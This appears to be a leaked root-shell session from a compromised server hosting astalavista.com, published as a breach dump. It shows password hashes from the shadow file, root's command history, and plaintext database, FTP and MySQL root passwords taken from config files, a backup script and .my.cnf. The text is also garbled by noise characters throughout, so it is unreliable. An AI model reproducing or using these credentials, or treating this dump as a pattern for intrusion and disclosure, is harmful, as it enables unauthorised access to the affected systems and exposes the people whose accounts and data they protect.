: X$ L/ {: h# I! h5 @; [" h# f8 p* Dcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
/ H! O2 ]4 v* q/ Kastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::; t3 ^( h, ~& T# ]$ ^' T* _
H3 @, F. L {1 n, d' x; p
sh-3.2# cat /etc/motd
t5 N" C! n8 L8 h#####################################################
4 R( Q/ S% q( s#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #4 m X. v* w9 {7 ]: S& s9 v
# |__| [__ | |__| | |__| | | | [__ | |__| #( l) ^3 ?& B) O* ]2 t) W4 G" g
# | | ___] | | | |___ | | \/ | ___] | | | #9 A" l- e5 K P A
# #
! C, N' g( E( y#####################################################+ k& B. r5 b) U# B8 D p; ` \
# #. ]: V# x7 I# r- l! t% {
# Admin Contact - 链接标记support@secureservertech.com #" _, s5 D" h" e8 h0 V6 B/ `+ B4 J
# #
2 d* d, p1 R' y) b# Available ShortCuts #1 b$ V& l6 ^/ Q' h* s
# #
# G, w; t' X o% ^9 h( T% {# nst - list active connections #4 I# ^0 y! {$ A; Y9 T$ M1 a/ M
# ddos - shows how many times each ip is connected #" c* g3 s$ |0 ?
# ltr - restart the webserver # N/ ~! ]1 D3 ]8 T+ P
# phpc - edit the php config file #
4 z8 T7 K ^* p+ d6 ^- x# htc - edit the webserver configuration file ## I5 M4 \# e4 N$ ^, ^
# up - uptime #
5 O0 A; ^, ~! ~3 P+ ~. X# etd - edit the motd of the day file #
, H4 W! ?4 L5 \/ N( D: O, M# htr - start and restart apache if needed #
0 U( _2 M& | ? a# syng - shows active SYN_RECV connections #' J/ ?* H |' h/ V
# synd - syn flood blocker - “synd -h” for usage #
9 }9 J6 C% f+ Q7 E) D$ ~$ I& \#####################################################: k5 ~+ ~7 N2 p( c* Y" x
# NOTES: #
& r+ f5 j0 N+ O6 u3 j ~9 N: m" ^# Last Upgrade - 12-08-2008 by JF #7 k2 L: k$ \- R2 D/ O C- F0 P
# My.cnf/Mysql Optimization - 1-28-09 #
- _1 q6 I0 s8 ]3 N# #
2 c+ V' }8 k2 V+ f# #5 d5 l8 z( [0 k1 c# p) X2 c1 e
# #
) L1 K$ P! `0 D, ?6 {5 Y#####################################################" O) s" }, m+ P' D
2 i/ ^' R) @0 {7 p7 w/ c5 o }# Fsh-3.2# lastlog | grep -v Never, ^$ @2 q$ h5 C8 A
Username Port From Latest4 ?" X; E. R4 U
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
% N% H2 j& f# F7 G6 I+ l& g, Xadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
$ J# p7 P' m5 j4 `3 ^com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20093 F$ ?$ z% K. V |$ ` @' Z3 I6 |
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
+ H) |) v- a+ b4 _" W( a6 u
7 ^+ p$ ]! N @% J2 }( ^sh-3.2# ls -la a) ?# w0 A! G( e: K% }
total 453376
1 S/ @ J( ^# F8 Udrwxr-x— 15 root root 4096 Jun 4 08:40 .) }, N m! ~2 N, k0 ^$ l/ U% g$ _
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..7 Z+ c8 ^: }; u. a1 ]
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip; E3 o$ E% |& A3 u- {4 W
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
. j* \; n0 C0 M0 Z-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
0 R% w5 D( e, M- A S-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
; W: ]$ Q8 P! Y) [! T-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
' P% c& h1 V5 i( p-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc1 b0 b3 q' o) V Z5 d! ~
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh/ | r- |) N1 G' u' l
-rw-r–r– 1 root root 1327 Nov 29 2007 cert" d* w, f- I2 r" m" O$ _( i4 m
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
- S1 g/ n6 y5 d0 I# @drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
+ h# }2 R0 |' X' N4 ]4 |-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
5 m1 R8 R8 K9 E% d) y-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
, M! c. x) L4 M+ Z# A/ Ldrwx—— 2 root root 4096 Oct 28 2007 .elinks( C1 c9 g3 K: {2 n6 A3 V4 J
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.17 ~) q# S7 I$ T- N4 k' N: p# z
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2; H, m7 G2 @2 W# u" C/ P( d
-rw——- 1 root root 0 Apr 16 13:19 .history
: e: r8 [8 N3 r( h$ ]( Q2 }-rw-r–r– 1 root root 16095 Sep 11 2007 install.log1 [4 P! y- R0 K0 x# T" @
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
; ~2 i: N& M# _0 A6 @* K0 U9 R4 L-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
, l' i6 f& k# \9 R P: J5 w& e-rw——- 1 root root 35 Jun 2 14:23 .lesshst
. m1 f. X6 j& \% E: ^4 d/ \& {) @drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
! ], G4 o3 |0 S) adrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec/ K% g$ ^" }3 x7 G/ _4 {6 }
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz8 w4 h$ d4 j. Y
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
# ^$ f: ~0 A7 W m( S-rwx—— 1 root root 760 Sep 18 2008 lp9 v% k6 R% w4 Z) c9 U4 o
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
( J% E+ e5 N9 [" K1 b1 i3 `-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz- `+ ~# O# w" C* ?) i
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
) d0 J6 a/ g% |# O5 A! u3 Hdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9* g" x% P: p. T/ D( V
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
1 P: Z8 R! E4 V idrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.35 O* j7 w; R/ L2 n ?. n
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
$ W7 C' H2 C0 X8 y) n/ h8 }-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
7 c" n1 _( _) C3 J( M-rw——- 1 root root 41 Oct 19 2007 .my.cnf
; w, t& q/ ?0 |' ]+ F7 S" B6 t' _. t-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history1 q! g: O' k9 t; a$ n# f- D
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
; _' _! b/ o+ \( s8 ^-rw——- 1 root root 41 May 20 2008 .mytop2 [8 `/ K& Z; ?9 z# b# Z1 L
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.61 v- F: L2 ^3 Z" E% O# ~& w
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
2 G4 {1 V9 } ^( S! [6 ldrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp6 f& B& y: ^ S" p
-rw——- 1 root root 1462 Sep 21 2007 opt.php P% B/ v' G2 ^# c @
-rw-r–r– 1 root root 3371 Sep 22 2007 p
- h% B0 t0 l& O* h-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz20 \; g* L7 o2 T" g/ }+ N. B
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
( p" M* P$ ^0 v8 N-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
6 U- \+ a1 @+ `& o+ C-rw-r–r– 1 root root 887 Nov 28 2007 server.key
- v& h$ \2 Q) G0 k$ D& s4 a& x& I# adrwx—— 2 root root 4096 Oct 10 2008 .ssh
h* z6 u. Y3 ^" X. {8 \-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
- R% g$ |! O. v e-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
$ U2 n! p* L( x; o-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
$ G0 W# T% l. P-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
1 m" N( J$ z1 T7 C# P* e! ?drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
5 q7 L* q. W2 w-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh6 E7 Z3 k! C+ K, }$ W. V1 J. Z- ^
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.07 H" }. [+ @3 ]+ E% c
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
$ L- X3 z2 }6 u2 H5 ?-rw——- 1 root root 12997 May 16 2008 .viminfo3 a* K0 _5 a3 N( _
/ Z8 o. Y; w7 ]8 O
sh-3.2# cat .bash_history
+ i0 G5 O% z( B2 d[snip]: ?0 M+ U- J( h1 `9 w
wget cp4sst.com/sstlinux.tar.gz
: }) B# F' q* o9 x; H' Vtar zxvf sstlinux.tar.gz
* F4 @( d$ \# h/ t" E4 w7 Kcd linux-2.6.27.10; N- O" O' a4 i0 p! \, O
sh install.sh6 P4 W+ l5 i. }1 |
make bzImage ; make modules ; make modules_install ; make install
2 H$ B& z, Q2 s1 l* p5 _+ Ymake clean. {3 f. [' G7 _, U4 `) t: P
service mysqld restart8 `4 |. ` b& a2 F N
[snip]
9 ^* n/ [: A2 l8 Q) u" rcd /usr/sbin/
# m0 E/ U8 X' Ochmod 4777 traceroute- f: x9 R+ h$ `) N
chmod 4777 ping: m& G8 W# B, o3 G8 G$ u
traceroute -I 链接标记[url]www.astalavista.ch[/url]2 h: D+ K/ L4 d9 L; W
[snip]
2 V/ n/ m g/ w( v5 M$ t! R7 s& ^. T" Vvi /etc/csf/csf.conf
; l6 J$ I3 N3 B" Q: W% Ztraceroute google.ch* Z: f5 k5 Y: V" }7 J9 ~8 e2 n& a3 [
service csf restart
) T* E( D- e+ t( E/ r( `3 Otracert google.ch
* I$ z; `9 \ E1 kservice csf restart
: j7 o. y: Z" J4 C t/ Utraceroute 链接标记[url]www.google.ch[/url], U" U6 l- V) t; N# G2 J
tracert 链接标记[url]www.google.ch[/url]
- j8 ?# z, J) F0 a- ltraceroute 链接标记[url]www.google.ch[/url]
' l0 d' t( e$ k9 J9 i7 q4 r: tlocate traceroute3 _2 W8 w& M6 n8 k0 ~6 @( ?4 @4 }
chown 4755 /bin/traceroute
2 Z: ?8 I7 s, ?4 K* m W+ g* }chown 4777 /bin/traceroute
, j# M1 g) B5 ` m# R6 ^5 j) elocate ping
8 x) \& ^9 F% f# zchown 4755 /bin/ping
7 X3 e: P7 F+ m% q: o2 Bchown 4777 /bin/ping& Y- h& m" y3 P( L( p) u
cd /bin/
5 t" R3 T4 H/ @ \" Fls -ali | grep ping
U3 ]' S4 u I' P' w4 cchown root ping: s3 x. _/ j& J- F
chmod 4755 ping+ q, q( T0 g! _6 |& v$ e2 v0 |5 W
ls -ali | grep traceroute# s. J( T, {8 O q5 g% k: y2 y
chown root traceroute
6 A y" m3 I7 ?& c) Y6 _" uchmod 4755 traceroute
) O9 N) |& Q+ e" cls -ali | grep traceroute
5 z6 r- b; G' Etraceroute -I 链接标记[url]www.google.ch[/url]
, F- W, d* H: [8 Vtraceroute 链接标记[url]www.google.ch[/url]) G# N3 u4 S0 z5 i1 _" U2 G
whois pmsantos.ch- e" c8 i1 G) f7 c
[snip]
. W6 S' n+ \) c5 }: Fmysql -h com_contrexx2_live < /root/defaultp_ports.sql
2 y( p; g) [% p( ]mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql4 q* T) k' Q7 t. ~3 I8 H
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql& f0 u9 p9 ? V% z; y7 D+ q& a) I
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql, e @7 e6 u) f, P. D
top: K0 _1 ^+ G0 _) s( |7 w
ping ssth.ch
' W5 ~# f& a0 M$ a( g$ E: v1 Mping asdlkfaljgasd???ljg???lasj.ch1 X# |7 r G$ e o/ \0 V+ m( v
ping asdlkfaljgasdlasj.ch( q6 t( ~* t( q2 N, l1 \0 ^
ping 链接标记[url]www.ssth.ch[/url]* g5 q6 z$ [* k7 N O7 }
ping ssth.ch% c' e% U7 F: w- m- F
nslookup 链接标记[url]www.google.ch[/url]& M% A) P8 f6 R
nslookup 链接标记[url]www.ssth.ch[/url]' H6 E) x: |' T2 l# U
man nslookup' N, f* A5 D$ c: I$ i& O
ping 链接标记[url]www.google.ch[/url]: s5 V4 @8 J) F' N; ]" f1 C
nslookup 链接标记[url]www.google.ch[/url]
; X/ H" o" G$ i; h2 ^+ ?0 fnslookup 链接标记[url]www.google.ch[/url]
6 s! ?: W! u* o$ d9 S9 p$ O3 }$ mnslookup salfjasdlf.ch- P* E7 _" f9 D q* q( a, |
[snip]
7 t, e8 K2 d" b) K. z) ~openssl passwd -1 sadf( o; x' D0 {# f7 ]6 m, v& R
openssl passwd -1 5cZNHstdTy
( R" a. ^9 w$ Q- M# l1 {! ~mysql6 V5 g, K& D5 w; e2 ^
mysql1 T. o6 l8 y+ D3 `% Q+ m
locate proftp
# {! Y, k+ S" P6 [$ _) U3 avi /etc/proftpd.passwd
+ K( P$ q$ N% {% H- }8 ]service proftpd restart1 S5 P6 F" m4 p5 F4 L
locate proftpd.conf
" ~' U6 J1 z/ g9 ]: e Dvi /etc/proftpd.conf0 B. h X5 F5 Z3 P0 F
vi /etc/proftpd.passwd
n4 j0 g3 `- K" u! Qservice proftpd restart5 p! Q6 l( u! C8 f" Q( a/ |
[snip]3 p+ G, ~' ?7 Z. Z
/bin/sh /home/com/backup_system/backup.sh; A( d5 @1 j2 z# d9 w
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
1 L3 W# s* \* q/ Xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql+ o+ I3 m8 _7 i" f# Z- Z( d
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
" d) \: M0 c) J- F6 xls -ali* M$ ] }# c7 c% u4 v$ g5 J
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
" t4 r' V4 S! t% h/ Xmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
) O, k- ?' ~: O# h5 Ccrontab -l
9 I8 n3 ~2 N7 v* m" icrontab -l
1 n T$ x& N7 ], yphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
* ^$ R7 F; M; S# F7 `5 m9 P3 X. b/home/com/public_html/modifications/cronjobs/exploits.sh) s, Z- o, t* J4 r; d) _
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]* ^* c! N) `9 Y) u
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz0 J: i4 z; Q! D4 h8 n. Z
cd lsws-4.0.3
J7 C4 A1 X9 w3 F2 @3 csh install.sh" f- W3 z& K1 t+ u+ l
uptime$ T& F7 Q( z. y/ H3 ^: P
hdparm -tt /dev/sda9 n$ x2 t, c* Q) d% g& q- q( v
iostat5 `2 G) Y5 h J, f4 q9 E7 w
yum install iostat3 f4 Y0 h' |3 r4 W
iostat0 l' J9 \2 B7 G P ]6 y* n4 K
whereis iostat# l' V+ C+ ^* c4 e& Y s/ M, ]' n
yjm clean all7 w, e o) g9 g* o% s
yum clean all ; yum -y update- d4 V! m J& R. w K
iostat
9 f( `" x- s+ s0 Syum install systat
# [0 Q7 x1 G0 `9 [rpm -qa | grep iostat
9 ~) I4 I4 t2 h! F& l& erpm -qa | grep sysstat7 R- e( x$ A" q9 |' U7 r
rpm -qa | grep systat
* k- s1 u$ ?2 d$ i) O% w; e# bdmesg -c4 H8 o3 K, t5 {3 {; P; e) V
sysctl -p
* t/ q! z$ S4 Q) O- buname -r( S. r* F" v) Z6 ~ D
cd /usr/src
4 ~" v* [, _% B4 Q; t( H$ Uwget nix101.com/kernels/sstlinux.tar.gz- T0 x% R- i! Z- ^
shutdown -r now
$ S9 o% x/ l% [9 y& L& mnano -w /boot/grub/grub.conf2 g/ X( N9 Y% H: r/ W
, ~/ |$ ]$ N. g1 tsh-3.2# cat .my.cnf
R+ j8 N9 F$ k4 u# i+ h5 S( w( |[client]
" ]6 f! R7 l% U) X6 x& C/ Zuser=da_admin
5 U( j# w4 T( dpassword=X9dctmRH. r: H# b' b; c9 r4 R, w
. X. W# e$ j5 ~0 Z1 H+ F& v
sh-3.2# cat /home/com/backup_system/backup.sh* D2 H% b' `% J7 `! @
#!/bin/sh& _7 W K, P2 L7 S4 d5 g8 O1 U# `2 }9 v
###################################################################### C8 }% {6 l" V, `5 j
# #
8 I* x6 Y! H" [& l/ `# incremental backup for astalavista.com #
; a( P6 ]/ k6 g6 T! ~# #
6 h: g% w! |) K8 X# F1 f# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
) M, D6 l5 }9 Y" T! D# #$ ~ I1 @+ T- R$ F8 D }% d
#####################################################################8 u8 o0 b$ l+ _: k* ~6 T
[snip]' w, N7 Z2 `8 `- ?% _
PROG_DIR=”/home/com/backup_system”;' y4 o; d! }: Q3 d0 E: [! T- @
BACKUP_DIR=”/home/com/backups”;
, ~6 x8 E. `' U( U6 t' | X5 I, ?DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
; d4 U" C0 X" G' ?5 k) R# ftp for synology backup server# A0 Y* t7 _! B) h$ t3 F
FTP_HOST=”212.254.194.163″;
; m1 p6 |, `0 aFTP_PORT=”21″;
7 c( { L5 W# y" t0 T BFTP_USER=”astalavista.com”;
9 {/ E5 X' e* ^: ~FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;% R! R: |. }; f. o
FTP_DIR=”/astalavista.com”;' c5 {- F4 m7 n. d
# database4 Y" E2 _; a- t- h8 G/ O8 z# A8 J
DB_HOST=”localhost”;5 A# U% Q% Y. A# x
DB_USER=”contrexxuser2″;
. s$ a( }% s8 `+ g4 f" t) ZDB_PASS=”0fEYNZgXz1pKe”;! K3 q, Q6 h- R& B/ T. }- D& B
DB_DATABASE1=”com_contrexx2_live”;
3 G9 j( O! ]6 j: c% l+ B6 {6 r4 WDB_DATABASE2=”com_contrexx2″;- t2 `( h* }7 r5 @1 ]
[snip]
( o$ W; A. a& k4 ?' ^ftp -in $FTP_HOST $FTP_PORT <<EOF- M$ A, Q7 g; H5 t# R+ y
quote USER $FTP_USER
+ i1 Q4 j: W3 g! Z) Y0 r0 cquote PASS $FTP_PASS
5 p# X% D; Y) |6 k5 Ocd $FTP_DIR
6 T: w: v; O/ s5 P* j$ {- }- W$ Tput $DB_FULLNAME-SQL_Dump.tar2 X$ n8 W& {8 J$ I
put $BACKUP_FULLNAME-Public_HTML.tar+ i: ?' L: A; \ n
close" T) j4 B0 t8 o( |9 H
bye
: B$ C( S; D, z; }9 m! M" m9 Y0 t0 ]EOF
; L- ]- C M3 m
! [- A4 F4 j$ o- h7 ^sh-3.2# cd /home
% a% S0 ]* [! gsh-3.2# ls -la4 t5 X( Q6 i9 z( n5 m6 r3 P; s
total 120
( t; m1 M9 k1 z) c7 Y2 p8 ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
& B1 G/ u9 [) t$ v( gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
. A" i r& L6 G- `# Adrwx–x–x 9 admin admin 4096 Nov 28 2007 admin `- a' f. l- Q8 v+ r
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 z' |; Y' r$ d-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
& {; T. L! U7 m% Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet% P5 z' M. K& m$ r3 Z8 @
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup9 p) Y1 M. C! R- R& }, U1 F
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
9 w* K2 ]6 x$ \drwx–x–x 10 com com 4096 Apr 28 12:40 com; V( u( i ~4 I8 c" V, I) m: F u
drwxr-xr-x 2 root root 4096 May 17 2007 ftp$ N7 N: n7 T8 m3 ]* U9 x
drwx—— 3 jon jon 4096 Sep 21 2007 jon0 j) N0 m% _6 u
drwx—— 2 root root 16384 Sep 11 2007 lost+found
3 }9 [; K. ~: Ydrwxr-xr-x 2 root root 4096 Sep 14 2007 my
$ I A% U, Y: n- C9 J7 xdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: E8 G3 N9 s' D3 ]% ?3 |' Cdrwx—— 2 jon jon 4096 Sep 15 2007 test; S1 F4 C4 k( o8 U" U
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp0 w! } B$ U3 e* L4 \5 }
" Q3 X7 [" y$ ]$ C) Q8 H6 P/ Ush-3.2# cd admin
* v# g; I9 ]+ Z! P* h: ~1 Dsh-3.2# ls -la+ w& N0 W) P# K: S
total 1735896
% W, `3 W4 L0 @+ J, q; l) f) bdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
5 E, |) V& U- W; }, _drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 W% P' w, p$ k, j4 K+ q3 S8 s3 h4 i
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- _9 s+ f9 {6 s2 b. k2 Zdrwx—— 2 admin admin 4096 Sep 28 2007 backups- o2 C0 n" G2 ] I' H% ~* I) }
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history% Z8 K$ l* L) E/ O& f0 w) X
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
9 }3 c0 _- | F. X; M7 x3 [-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile3 V7 _' Y- {5 P9 v" R. x
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc' A/ I! T! z6 h/ i
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups$ a6 _! |, n4 q* S' o
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
1 V) G z4 R+ S) ^! Pdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
' p" b( ^# G: [8 o-rw-r–r– 1 root root 24 Sep 21 2007 info.php0 r* h4 J0 q4 E
drwx—— 2 admin admin 4096 Sep 21 2007 mail# a* R( y! Q- C& v
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr$ e4 K& ]4 S4 Z
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 J: r2 W: T. F1 Y-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
0 }. a* H" {2 b-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz0 S7 y' K0 O R2 T; X! Q; R
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups" K, J2 q5 Q0 y% T$ Y' s
. n1 X. S R6 U$ Xsh-3.2# ..; P3 Y( K& L9 s$ U$ J
sh-3.2# cd jon- N9 A3 d- w+ k+ N( s1 n
sh-3.2# ls -la- Q* q( |/ I5 Z! S7 Y5 E- S, j
total 36
- k, }5 q5 m% Rdrwx—— 3 jon jon 4096 Sep 21 2007 .
" I4 u! T) S' d% [6 [+ tdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 ?' U& Y0 Z, W-rw——- 1 jon jon 53 Sep 21 2007 .bash_history$ H: b& u. x, h. D' w8 p a( R
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
+ v& `1 p; U, O9 `7 |4 ]+ [6 p' z-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile c4 M* b: H- ?0 z9 m
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
; C; L# x2 T- I. M-rw-r–r– 1 root root 24 Sep 21 2007 info.php
% b4 b( N. w% ^1 i# S' Z: ddrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html9 z7 j. W+ T! J/ K. F9 h3 _: w
' L9 ]* A* Q6 Y X0 L: H: G2 o
sh-3.2# cd ... Q2 S. Y, G2 e5 `% `) k) O
sh-3.2# cd test' J8 }! d! k. i l3 x' s
sh-3.2# ls -la
% b/ J& k8 B! [4 b Xtotal 48
- t% |% l# M) ]/ `" F7 ]- I1 }* Y5 Pdrwx—— 2 jon jon 4096 Sep 15 2007 .# A9 Z% j- ^6 N+ `' ?: w2 C3 a+ {
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ G4 d3 Y' O$ G Q-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
% _5 d# r I0 t8 S-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
6 |, i. m5 e& I6 z-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
* \% l' b$ P/ b+ V! G3 t/ R# }-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc% L* l+ ~* j: y4 O
sh-3.2# cat .bash_history6 R3 a9 r5 [ _. c! ?: h8 _
/usr/bin/mysqladmin -u root password PoliuJhytg67
) A: p, e3 o2 k0 y( T# L3 U
3 {+ j. e/ b6 l; j) H" X3 fsh-3.2# cd ..
, A9 V/ @8 z& H7 ~8 ~sh-3.2# cd astanet8 Q: e9 m% e. h' a
sh-3.2# ls -la! U1 T" ], s, v/ t: O2 ]- {! g
total 52
$ d% l: ?0 d3 Edrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
( p1 a0 b7 _) V8 i5 Vdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ I E7 U0 ^, ], F+ T; r' x
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
E% u" f* A1 X& ?-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
6 v( {) @+ `, c8 F3 X" f-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 g( P8 f( u+ @+ c4 e5 p6 _8 `) g
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile& V, k. N4 h r; k1 F) a
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
% C+ c6 D W `- X4 vdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
& W1 o. y+ a- m6 c6 W8 s! tdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap, h7 p: \! O, Z5 k+ `
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail* | j& {6 `9 s% ~- ]" s
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
% u, B+ `- d& T4 Slrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
5 a5 j9 R3 R% B- I, E8 B-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
) c" d5 v. q! m) s0 W# x* I( m6 F7 {, e9 @8 U
sh-3.2# cd auth/7 g( ^1 E; K' f
sh-3.2# ls -la g- H. f. c7 e; u* E" u6 J" w
total 28
5 o. Y& m; Z) T8 h7 Ydrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
8 d( o+ G3 c9 ^' Odrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..( ]0 V* R. b4 \. q
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php" F* Q- {6 q. {: a
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php. |* X S5 N- \4 G o; a, z
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
) x- ` j/ P& A# q* _# M3 c-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting# c& I3 T1 ~- o6 ?" g
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd' C$ W( O( Q9 M% o- o0 Z
6 L: V: {& J- J" b( ?) i2 |sh-3.2# cat hackercontest.config.inc.php
1 V' B5 _4 J! r4 `$ a9 Y<?PHP
* H8 L2 y( H* i// Variabeln f?r Verbindung zur Datenbank //
* }( H/ H) U& Z$conxHost = ‘localhost’; // MySQL hostname
6 W4 Y( h. Q4 E$conxUser = ‘hackercontest’; // MySQL user
' @9 F3 d3 k& |+ S$conxPassword = ‘K6m@7dUc’; // MySQL password4 E2 G# m' O* E1 R
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
2 S- N7 K" [3 h/ N/ j?>: ]& b. Z, p4 J) {
sh-3.2# cat hosting.config.inc.php
6 ]) J; T; g( C$ w9 n$ R8 Z<?PHP; ~6 z' m, s( E; }
// Variabeln f?r Verbindung zur Datenbank //1 r+ V4 w8 ^! Q0 z# a/ h5 s, p' o
$conxHost = ‘localhost’; // MySQL hostname: I( e" K- B7 q. c {& R' o. X
$conxUser = ‘hostinguser’; // MySQL user5 o, K) |1 `; v& g9 n
$conxPassword = ‘cXvB3981′; // MySQL password
/ \" n C. y. f) V5 T# a3 A$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
